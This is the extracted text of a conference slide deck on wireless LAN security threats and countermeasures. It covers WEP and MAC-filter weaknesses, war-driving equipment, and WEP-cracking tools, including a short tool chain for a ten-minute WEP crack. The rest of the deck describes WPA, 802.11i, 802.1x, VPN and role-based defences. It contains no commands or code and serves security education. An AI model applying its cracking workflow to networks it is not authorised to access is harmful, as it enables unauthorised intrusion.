WLAN HackingThreats and Countermeasures

WLAN HackingThreats and Countermeasures

RSA Europe, Vienna, 18 OctoberRSA Europe, Vienna, 18 October

John RhotonHP Services, Mobile Technology Lead

John RhotonHP Services, Mobile Technology Lead

Objectives

• Describe state of WLAN security

— Mechanisms

— Vulnerabilities/threats/exploits

• Provide countermeasures and best practices to address threats

SSID

MAC Filter

WEP

WPA/802.11i

Needs determine security

• Requires management of authorized MAC addresses

• LAA (Locally Administered Address) can override UAA (Universally Administered Address)

MAC Filters

802.11b Security Vulnerabilities

• Symmetric secret keys

—Poor key management

—Hardware theft is equivalent to key theft

• Algorithmic weaknesses

—WEP

—Packet spoofing, disassociation attack

—Replay attack

• Decoy AP

• Rogue AP

Equipment of a Wi-Fi freeloader

• Mobile device

— Linux

— Windows

— Pocket PC

• Wireless card

— Orinoco card

— Prism 2 card

• Driver for promiscuous mode

• Cantenna and wireless MMCX to N type cable

War driver gone wild

Bringing the “War” to War Driving

Bringing the “War” to War Driving

Tools

• NetStumbler—access point reconnaissance

— http://www.netstumbler.com

• WEPCrack—breaks 802.11 keys

— http://wepcrack.sourceforge.net/

• AirSnort—breaks 802.11 keys

— Needs only 5-10 million packets

— http://airsnort.shmoo.com/

• chopper

— Released August 2004

— Reduces number of necessary packets to 200-500 thousand

• Aircrack, Airopeek, Airsnare, Airmagnet, Airjack, Aerosol, Kismet, Packetyzer, NAI Sniffer, Retina WiFi Scanner…

NetStumbler

WiFiFoFum

Airsnort cracked the WEP key – About 16 hours

• chopper reduces by an order of magnitude

FBI – ISSA Los Angeles 2005

FBI Computer Scientist James C. Smith (left) &

FBI Special Agent Geoff Bickers (right)

broke 128-bit WEP key in three minutes

Ten-minute WEP crack

• Kismet

— reconnaissance

• Airodump

— WEP cracking

• Void11

— deauth attack

• Aireplay

— replay attack

Source: tom’s networking

Wireless LAN security evolution

1999 2003 2005

WEPWEP

WPAWPA

802.11i /WPA2

802.11i /WPA2

Timeline

Privacy: 40 bit RC4 with 24 bit IV

Auth: SSID and Shared key

Integrity: CRC

Privacy: Per packet keying (RC4) with 48 bit IV

Auth: 802.1x+ EAP

Integrity: MIC

Privacy: AES

Auth: 802.1x+ EAP

Integrity: MIC

Secu

rity

Improved Security Proposals ( WPA)

• Temporal Key Integrity Protocol

—Fast/Per packet keying

—Message Integrity Check (MIC)

• Multilinear Modular Hash (MMH replaces CRC)

• WPA-Personal

—Pre-shared key (Alphanumeric password)

• WPA-Enterprise

—802.1x (adapted for 802.11 MAC by 802.11i WG) with EAP

—No predefined EAP mechanisms

IEEE 802.1x Explanation

Controlled port

Uncontrolled port

Supplicant Authentication Server

Authenticator

• Restricts physical access to the WLAN

• Handles automated key change

• Can use existing authentication system

EAP Methods client/server dependent

• Both Client and RADIUS server must support same EAP method

• Microsoft

—supports EAP API for XP and W2K.

—EAP-MD5 disallowed for wireless

—EAP-TLS in Windows XP release

—Service pack 1 adds protected EAP (PEAP)

• MS-CHAPv2—passwords

• TLS (SSL channel)—certificates

PEAP-EAP-TLS a little slower than EAP-TLS

• SecurID—but not tested/supported for wireless

802.1x Implementation

• 802.1x supplicant

• 802.1x capable Access Point

• 802.1x Authorization Server

Supplicant(Client)

Authenticator(Access Point)

Authentication Server(RADIUS Server)

RADIUS802.1xEAP EAP

TKIP / MIC

• Ratified June 2004

• AES selected by National Institute of Standards and Technology (NIST) as replacement for DES

• Symmetric-key block cipher

• Computationally efficient

• Can use large keys (> 1024 bits)

• Cipher Block Chaining Message Authentication Code (CBC-MAC or CCMP) replaces TKIP—RFC 3610

• May require equipment upgrades—Some WPA implementations already support AES

• Update for Windows XP (KB893357)

• Transition Security Networks (TSN) interoperate with WEP

• Robust Security Networks (RSN) prohibit WEP

802.11i / WPA2

VPN Overlay

VPNConcentrator

Role-based Access Control

• Bluesocket

• Perfigo (Cisco)

• Cranite

• Aruba

• HP ProCurve (Vernier)

Role

Schedule

Location

UserAccessControl

IP Address PortTime

VLAN

Enterprise WLAN Security Options

• WPA – Enterprise— Eventual transition to 802.11i

— Requires WPA-compliant APs and NICs

• VPN Overlay— Performance overhead (20-30%)

— VPN Concentrator required

• RBAC— Additional appliance and infrastructure

— Most refined access

Home WLAN: WEP key rotation, firewall, intrusion detection

Public WLAN: MAC address filter, secure billing, VPN passthrough

Rogue Access Points

• Highest risk when WLANs are NOT implemented

— Usually completely unsecured

— Connected by naïve (rather than malicious) users

• Intrusion Detection Products

— Manual, Sensors, Infrastructure

• Multi-layer perimeters

— 802.1x

— RBAC, VPNInternetIntranetAccess

Summary

• WLAN security had a bad start

— WEP is insufficient

— MAC filtering is even worse

• WPA and 802.11i are solid

— As far as we know today…

• Consider multi-layer perimeter control (VPN, RBAC)

• Opt-out disabled

— Rogue access points are the biggest threat of all!

Send mail to: john.rhoton@hp.com